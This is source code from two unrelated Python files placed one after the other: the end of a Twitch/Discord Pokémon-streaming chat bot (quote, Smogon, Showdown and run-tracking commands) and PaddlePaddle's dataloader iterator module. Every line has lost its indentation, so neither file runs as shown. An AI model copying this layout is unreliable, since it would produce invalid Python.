key = line.split(" ")[1]
try:
key_int = int(key)
is_int = True
except:
pass
else:
key = random.choice(list(self.config['quotes'].keys()))
is_int = True
if is_int:
if self.config['quotes'].get(key):
quote = 'Quote #' + key + ' "'
quote += self.config['quotes'][key]
quote += '" -' + self.username
else:
self.output_msg(c, "Quote #" + key + " not found", source_user)
else:
matches = [q for q in self.config['quotes'].values() if key.lower() in q.lower()]
if len(matches) > 0:
selected_match = random.choice(matches)
for k, v in self.config['quotes'].items():
if v == selected_match:
quote = 'Quote #' + k + ' "'
quote += self.config['quotes'][k]
quote += '" -' + self.username
else:
self.output_msg(c, "Quote containing '" + key + "' not found", source_user)
if len(quote) > 0:
self.output_msg(c, quote, source_user)
# Update last output time
self.extra_command_cooldown["!quote"] = current_time
else:
self.output_msg(c, "No quotes available", source_user)
elif line.startswith("!addquote"):
if True == self.config['extra_commands_on']:
quote = line.split(" ", 1)[1].rstrip("\n").rstrip("\r")
key = 1
while self.config['quotes'].get(str(key)):
key += 1
key = str(key)
self.config['quotes'][key] = quote
self.update_config()
self.output_msg(c, "Quote #" + key + " added", source_user)
elif line.startswith("!delquote"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) == 2:
quoteNum = line.split(" ")[1].rstrip("\n").rstrip("\r")
if self.config['quotes'].get(quoteNum):
del self.config['quotes'][quoteNum]
self.update_config()
self.output_msg(c, "Quote #" + quoteNum + " deleted", source_user)
else:
self.output_msg(c, "Quote #" + quoteNum + " not found", source_user)
else:
self.output_msg(c, "Format: !delquote <quote number>", source_user)
elif line.startswith("!elo"):
if len(line.split(" ")) == 2:
ladder = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
else:
ladder = "gen7ou"
output = ""
result = requests.get("https://pokemonshowdown.com/users/" + self.username)
if result.status_code == 200:
soup = BeautifulSoup(result.content)
rows = soup.find_all("tr")
for row in rows:
cells = row.find_all("td")
if len(cells) >= 2:
if ladder == cells[0].text:
output = "Showdown '" + ladder + "' ELO: " + cells[1].text
break
if len(output) == 0:
output = "Showdown ladder '" + ladder + "' not found"
self.output_msg(c, output, source_user)
elif line.startswith("!smogon "):
if len(line.split(" ")) == 2:
pkmn = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
one_month = 60 * 60 * 24 * 30
#requests_cache.install_cache("smogon", backend='sqlite', expire_after=one_month)
result = requests.get("http://www.smogon.com/dex/sm/pokemon/" + pkmn)
if result.status_code == 200:
data_re = re.compile(r'dexSettings = (\{.*\})')
text_content = result.content.decode('utf-8')
matches = data_re.search(text_content)
output = ""
if matches:
json_data = matches.group(1)
data = json.loads(json_data)
inject_rpcs = data["injectRpcs"]
for inj in inject_rpcs:
if "dump-pokemon" in inj[0]:
data_dict = inj[1]
if len(data_dict["strategies"]) > 0:
strat = data_dict["strategies"][0]
movesets = strat["movesets"]
tier = strat["format"]
for moveset in movesets:
output = "(" + tier + ") "
output += moveset["name"]
output += ": "
for moveslot in moveset["moveslots"]:
output += moveslot[0]
output += ", "
output = output.rsplit(", ", 1)[0]
output += " - "
output += moveset["abilities"][0]
output += " - "
output += moveset["items"][0]
self.output_msg(c, output, source_user, 0)
break
if len(output) == 0:
self.output_msg(c, "Could not find Smogon information for '" + pkmn + "'", source_user)
#requests_cache.uninstall_cache()
else:
self.output_msg(c, "Format: !smogon <pokemon>", source_user)
elif line.startswith("!chatbattle"):
# Streamer only
#if source_user.lower() == self.username.lower():
if source_user.lower() == "drfujibot":
try:
server_address = '/tmp/fuji_to_node.sock'
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(server_address)
node_command = ".searchbattle gen7randombattle"
msg = json.dumps({"line": node_command}).encode('UTF-8')
sock.send(msg)
sock.send(b"\r\n")
sock.close()
print("Sent command")
server_address = '/tmp/node_to_fuji.sock'
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(server_address)
sock.listen(5)
conn, addr = sock.accept()
print("Waiting for response")
response = conn.recv(1024)
if response:
response = response.decode('utf-8')
sock.close()
os.remove('/tmp/node_to_fuji.sock')
print("Closing socket")
if response:
self.battle_room = response
self.output_msg(c, "Click here to spectate: http://play.pokemonshowdown.com/" + response, source_user)
else:
print("No response")
except:
self.output_msg(c, "Error, Showdown component not running", source_user)
elif line.startswith("!forfeit"):
# Streamer only
if source_user.lower() == self.username.lower():
if len(self.battle_room) > 0:
try:
server_address = '/tmp/fuji_to_node.sock'
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(server_address)
node_command = ".leave " + self.battle_room
msg = json.dumps({"line": node_command}).encode('UTF-8')
sock.send(msg)
sock.send(b"\r\n")
sock.close()
self.output_msg(c, "Forfeited " + self.battle_room, source_user)
self.battle_room = ""
except:
self.output_msg(c, "Error, Showdown component not running", source_user)
else:
self.output_msg(c, "Not currently in a battle", source_user)
elif line.startswith("!setrun"):
if len(line.split(" ")) >= 2:
run_name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
self.config['current_run'] = run_name
if None == self.config['run_data'].get(run_name):
# Run doesn't exist yet, so create it
self.config['run_data'][run_name] = {}
self.config['run_data'][run_name]['game'] = self.game
self.config['run_data'][run_name]['deaths'] = self.deaths
self.config['run_data'][run_name]['closed_events'] = {}
self.config['run_data'][run_name]['attempt'] = 1
# Clear closed_events, since this is a new run.
# Old closed_events should already be saved for previous run.
self.closed_events = {}
self.config['closed_events'] = {}
else:
# Run exists
if None != self.config['run_data'][run_name].get('game'):
# Get current game from run data, if it exists
self.game = self.config['run_data'][run_name].get('game')
# Sync run data game, in case it didn't exist
self.config['run_data'][run_name]['game'] = self.game
# Set config file game
self.config['games'][self.username] = self.game
if None != self.config['run_data'][run_name].get('deaths'):
# Get current deaths from run data, if it exists
self.deaths = self.config['run_data'][run_name].get('deaths')
# Sync run data deaths, in case it didn't exist
self.config['run_data'][run_name]['deaths'] = self.deaths
# Set config file deaths
self.config['deaths'] = self.deaths
if None != self.config['run_data'][run_name].get('closed_events'):
# Get current closed_events from run data, if it exists
self.closed_events = copy.deepcopy(self.config['run_data'][run_name].get('closed_events'))
# Sync run data closed_events, in case it didn't exist
self.config['run_data'][run_name]['closed_events'] = copy.deepcopy(self.closed_events)
# Set config file closed_events
self.config['closed_events'] = copy.deepcopy(self.closed_events)
self.update_config()
self.output_msg(c, "Set current run to '" + run_name + "'", source_user)
else:
self.output_msg(c, "Format: !setrun <run name>", source_user)
elif line.startswith("!combo"):
if self.config.get('highest_combo'):
self.output_msg(c, "Highest combo: " + str(self.config['highest_combo'][0]) + "x ( " + self.config['highest_combo'][1] + " )", source_user)
elif line.startswith("!attempt"):
if None != self.config.get('run_data') and None != self.config.get('current_run'):
if None != self.config['run_data'][self.config['current_run']].get('attempt'):
attempt = self.config['run_data'][self.config['current_run']].get('attempt')
self.output_msg(c, "This is attempt #" + str(attempt), source_user)
elif line.startswith("!swearjar"):
if len(line.split(" ")) >= 2:
try:
swearjar = int(line.split(" ", 1)[1].rstrip("\n").rstrip("\r"))
self.config['swearjar'] = swearjar
self.update_config()
self.output_msg(c, "Swear jar: " + str(swearjar), source_user)
except:
self.output_msg(c, "Invalid swearjar value", source_user)
else:
swearjar = self.config.get('swearjar')
if swearjar:
swearjar += 1
else:
swearjar = 1
self.config['swearjar'] = swearjar
self.update_config()
self.output_msg(c, "Swear jar: " + str(swearjar), source_user)
elif line.startswith("!define"):
if len(line.split(" ")) >= 2:
replacement = line.split(" ", 1)[1].rstrip("\n").rstrip("\r")
else:
replacement = 'Nuzlocke'
success = False
while not success:
try:
random_title = wikipedia.random()
print(random_title)
summary = wikipedia.summary(random_title)
if '(' in random_title:
random_title = random_title[:random_title.index('(')]
summary = summary.replace('\n', ' ')
if len(summary) > 248:
summary = summary[:248]
nuzlocke_re = re.compile(random_title, re.IGNORECASE)
summary = nuzlocke_re.sub(replacement, summary)
self.output_msg(c, summary, source_user)
success = True
except:
pass
# NEW COMMANDS GO HERE ^^^
else:
if True == self.config['extra_commands_on']:
if len(line.split(" ")) >= 2:
cmd = line.split(" ")[0].rstrip("\n").rstrip("\r").lower()
else:
cmd = line.rstrip("\n").rstrip("\r").lower()
print(cmd)
last_output = self.extra_command_cooldown.get(cmd)
should_output = False
current_time = datetime.datetime.now()
if None == last_output:
should_output = True
else:
diff = current_time - last_output
if diff.seconds >= 30:
should_output = True
if should_output:
if self.is_setrun_command(cmd):
message = self.get_current_run_data(cmd)
if None == message:
message = self.config['extra_commands'].get(cmd)
else:
message = self.config['extra_commands'].get(cmd)
if None != message:
self.output_msg(c, message, source_user)
# Update last output time
self.extra_command_cooldown[cmd] = current_time
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def do_command(self, e, cmd):
pass
class DrFujiBotDiscord(discord.Client):
def __init__(self):
super().__init__()
self.user_ids = {}
async def send_channel_wrapper(self, output):
await self.send_message(self.get_channel(self.channel_id), output)
async def send_dm_wrapper(self, output, user):
user_object = await self.get_user_info(self.user_ids[user])
if user_object:
msg = await self.send_message(user_object, output)
else:
print('User not found: ' + user)
def discord_output(self, drfujibot, c, output, user, sleeptime=0):
if self.whisper:
asyncio.run_coroutine_threadsafe(self.send_dm_wrapper(output, user), self.loop)
else:
asyncio.run_coroutine_threadsafe(self.send_channel_wrapper(output), self.loop)
print(output)
with open(self.logname, "a") as f:
f.write(output + "\n")
f.flush()
def setProperties(self, username, permitted_users, moderators, g_whisperMode, game, channel_id, logname, bot_type):
self.channel_id = channel_id
self.logname = logname
self.whisper = g_whisperMode
self.bot = DrFujiBot(username, permitted_users, moderators, g_whisperMode, game, bot_type)
self.bot.permissions = False
self.bot.output_msg = types.MethodType(self.discord_output, self.bot)
def on_discord_msg(self, line, source_user, source_id):
self.bot.log_cmd(line, source_user)
c = None
self.bot.handle_respects(line, source_user, discord=True)
self.bot.processCommand(line, c, source_user, source_id)
def on_discord_direct_message(self, line, source_user, author_id):
if source_user not in self.user_ids:
self.user_ids[source_user] = author_id
if source_user not in self.bot.previous_users:
c = None
self.bot.output_msg(c, "I see this may be your first time using DrFujiBot! Feel free to check out the documentation: http://goo.gl/JGG3LT You can also follow me on Twitter! https://twitter.com/drfujibot", source_user)
self.bot.previous_users[source_user] = 1
with open('whisper_discord_users.json', 'w') as config_file:
config_file.write(json.dumps(self.bot.previous_users))
self.bot.log_cmd(line, source_user)
c = None
self.bot.processCommand(line, c, source_user)
g_discordClient = DrFujiBotDiscord()
@g_discordClient.event
async def on_ready():
print('Connected to Discord')
await g_discordClient.change_presence(game=discord.Game(name='with genetic memes'))
@g_discordClient.event
async def on_message(message):
if g_discordClient.whisper:
if message.channel.is_private:
line = message.content
source_user = str(message.author)
g_discordClient.on_discord_direct_message(line, source_user, message.author.id)
else:
if message.channel.id == g_discordClient.channel_id:
line = message.content
source_user = message.author.name
source_id = message.author.id
g_discordClient.on_discord_msg(line, source_user, source_id)
def main():
#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
config = None
with open(sys.argv[1]) as config_file:
config = json.load(config_file)
if config:
permitted_users = config.get('permitted_users')
moderators = config.get('moderators')
username = config.get('streamer')
logname = username + '.log'
g_whisperMode = config.get('whisper')
bot_type = config.get('bot_type')
channel_id = config.get('channel_id')
game = None
if False == g_whisperMode:
game = config.get('games').get(username)
if len(username) >= 1:
print("Welcome to DrFujiBot, %s!" % (username))
users = []
for u in permitted_users:
users.append(u.lower())
users.insert(0, 'drfujibot')
users.insert(0, username.lower())
print("Permitted users are: " + ", ".join(users))
if None != moderators:
print("Moderators are: " + ", ".join(moderators))
random.seed()
with open(username + ".log", "a") as f:
f.write("BOT STARTUP\n")
f.flush()
if bot_type and "discord" == bot_type:
print('Starting Discord mode')
g_discordClient.setProperties(username, permitted_users, moderators, g_whisperMode, game, channel_id, logname, bot_type)
discord_key = get_fuji_config_value('discord_key')
g_discordClient.run(discord_key)
else:
g_bot = DrFujiBot(username, permitted_users, moderators, g_whisperMode, game, bot_type)
g_bot.start()
if "__main__" == __name__:
main()
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place, set_flags
# NOTE: queue has a different name in python2 and python3
import queue
import paddle
import paddle.profiler as profiler
from .. import core, layers
from ..framework import _non_static_mode, in_dygraph_mode, _in_legacy_dygraph
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException, \
_ResumeIteration
from .flat import _flatten_batch, _restore_batch
from paddle.profiler.timer import benchmark
__all__ = ['get_worker_info']
# NOTE: fix `terminate called without an active exception`
# if for loop break and program exit immediately(with no model
# layers processing) after iterate **the first few data** in
# distributed lauch mode, distributed launch will call
# terminate() to kill main process on each devices, but thread
# is still iterating to fullfill blocking queue caches, which
# may cause thread error `terminate called without an active
# exception` for terminate is a strong singal and `__del__`
# of DataLoader may not be called, so we add a global link to
# the last DataLoader instance to call `__del__` to clean up
# resources
# NOTE: cannot simply as `__del__` to CleanupFuncRegistrar,
# for this will remain a link to each DataLoader instance in
# global, and will precludes GC to auto collect DataLoader
# instance and will cause memory leak
_loader = None
def _clear_loader():
global _loader
if _loader is not None:
try:
_loader.__del__()
del _loader
except:
pass
CleanupFuncRegistrar.register(_clear_loader)
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._drop_last = loader.drop_last
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
self._sampler_iter = iter(self._index_sampler)
if self._auto_collate_batch:
self._collate_fn = loader.collate_fn or default_collate_fn
else:
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
@property
def _index_sampler(self):
if self._auto_collate_batch:
return self._batch_sampler
else:
if self._dataset_kind == _DatasetKind.MAP:
return list(range(len(self._dataset)))
else:
return _InfiniteIterableSampler(self._dataset, 1)
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
def _exit_thread_expectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.kill()
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, self._drop_last)
# NOTE: _structrue_infos used to record the data structure of
# batch to restore batch structure after reading Tensor
# from blocking_queue in single-process mode. Note that
# only single process is used in single-process mode, we
# can record the data structure sequencely in a list without
# recording the send and recv index
self._structure_infos = []
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 1 * len(self._places)
self._init_thread()
self._shutdown = False
global _loader
_loader = self
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
indices = next(self._sampler_iter)
# read data from dataset in mini-batch
# with paddle.fluid.dygraph.guard(place=paddle.CPUPlace()):
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices,
self._thread_done_event)
except StopIteration:
self._exit_thread_expectedly()
return
if batch is None or self._thread_done_event.is_set(): break
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
if self._thread_done_event.is_set(): break
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, (paddle.Tensor, core.eager.Tensor)):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if self._thread_done_event.is_set(): break
try:
self._blocking_queue.push(array)
except:
self._exit_thread_expectedly()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
self._exit_thread_expectedly()
def __next__(self):
trace_event = profiler.RecordEvent(
name="_DataLoaderIterSingleProcess",
event_type=profiler.TracerEventType.Dataloader)
trace_event.begin()
try:
benchmark().check_if_need_record(self)
benchmark().before_reader()
if in_dygraph_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if _in_legacy_dygraph():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else: # in static mode
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
benchmark().after_reader()
return data
except StopIteration:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
finally:
trace_event.end()
def _shutdown_thread(self):
if self._thread:
self._thread_done_event.set()
# NOTE: we wait for _thread exit for 3 seconds, if
# thread not exit normally, force kill it
for _ in range(3):
if self._thread.is_alive():
time.sleep(1)
else:
break
else:
if self._thread is not threading.current_thread():
self._thread.join()
self._thread = None
# python2 compatibility
def next(self):
return self.__next__()
def _try_shutdown_all(self):
if not self._shutdown:
try:
# # _blocking_queue in keep order mode holds sub-threads
# # need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
self._blocking_queue = None
# NOTE: blocking queue should be closed firstly for
# blocking queue read may hang and _thread_done_event
# cannot be checked
self._shutdown_thread()
finally:
self._shutdown = True
def __del__(self):
self._try_shutdown_all()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
self._persistent_workers = loader._persistent_workers
self._resume_worker_cnt = 0
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._drop_last, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
# thread event is only need in multi-processing mode
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
# resume iteration in following steps
# 1. Resume workers, clear worker caches
# put _ResumeIteration to all worker as resume iteration flag
with self._thread_lock:
self._resume_worker_cnt = self._num_workers
for worker_id in range(self._num_workers):
self._indices_queues[worker_id].put(_ResumeIteration())
self._batches_outstanding += 1
# all flag will be check in _thread_loop, simply wait here
while self._resume_worker_cnt > 0:
time.sleep(0.5)
# 2. clear blocking_queue caches
# in order not to restart the thread, we just clear
# the blocking_queue cachees instead of recreating one
while self._blocking_queue.size() >= len(self._places):
if in_dygraph_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
if _in_legacy_dygraph():
self._reader.read_next_var_list()
elif self._return_list:
self._reader.read_next_list()
else:
data = self._reader.read_next()
# 3. reset all states
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# set all worker status available
self._worker_status = [True] * self._num_workers
# 4. reset _sampler_iter and put prefetch indices to start next epoch
# init workers and indices queues and put 2 indices in each indices queue
self._sampler_iter = iter(self._index_sampler)
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _shutdown_worker(self, worker_id, shutdown=False):
if self._worker_status[worker_id] or (self._persistent_workers and
shutdown):
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self, timeout=None):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i, shutdown=True)
if not self._shutdown:
for w in self._workers:
w.join(timeout)
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
if isinstance(batch, _ResumeIteration):
assert self._resume_worker_cnt > 0
self._resume_worker_cnt -= 1
continue
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if isinstance(slot, (paddle.Tensor,
core.eager.Tensor)):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except Exception as e:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices is generated infinitely
# for each worker to raise StopIteration, but a StopIteration
# raising process will discard a batch indices which is count
# in _send_idx but will not increase _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: when _rcvd_idx catch up _send_idx, which means
# one of following:
# 1. all 2 * num_workers batches have been loaded
# and stored in _blocking_queue
# 2. all data drained
# we need to let _thread blocking at _data_queue
# get_data to inoccupy CPU, otherwise may occupy
# CPU time for model running
# NOTE: in persistent workers mode, do not check data
# drained here, simply let it go to _data_queue
# reading to get _ResumeIteration
if not self._persistent_workers:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers, if batches among workers drained, there
# may also be data in blocking queue
if self._batches_outstanding < len(self._places):
return None
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_STATUS_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker get StopIteraion, we shutdown this worker,
# note that this batch indices to trigger StopIteration
# is discard, outstanding batch number should be decrease
# and another indices should be put for other workers
# may still working.
if self._persistent_workers:
self._worker_status[data.worker_id] = False
else:
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(idx, _ResumeIteration) and batch is None \
and structure is None:
return idx
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in main process(for our implement has blocking queue,
# and blocking queue read is in main process) and thread, which may
# cause error following error
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-enter in increase _send_idx
# add a lock for threading save, for _try_put_indices is only a slight
# function which is not in data reading pipeline, this lock almost no
# influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
